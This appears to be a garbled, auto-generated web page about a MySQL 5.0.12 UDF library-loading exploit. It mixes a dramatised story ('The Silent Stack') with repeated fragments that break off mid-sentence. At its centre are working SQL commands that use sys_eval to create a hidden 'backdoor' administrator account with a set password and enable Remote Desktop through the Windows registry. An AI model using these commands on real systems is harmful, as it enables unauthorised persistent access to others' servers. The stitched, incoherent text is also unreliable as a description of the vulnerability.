Mysql 5.0.12 Exploit -

Outline

The CVE for the UDF arbitrary library loading wasn’t officially assigned until years later, but in the underground, it was simply called "The Silent Stack"—because the only sound you heard was your data walking out the door. mysql 5.0.12 exploit

SELECT sys_eval('net user backdoor S3cr3t! /add'); SELECT sys_eval('net localgroup administrators backdoor /add'); SELECT sys_eval('reg add HKLM\SYSTEM\CurrentControlSet\Control\TerminalServer /v fDenyTSConnections /t REG_DWORD /d 0 /f'); Outline The CVE for the UDF arbitrary library

The response came back: this_is_a_test . He had file system write access. but in the underground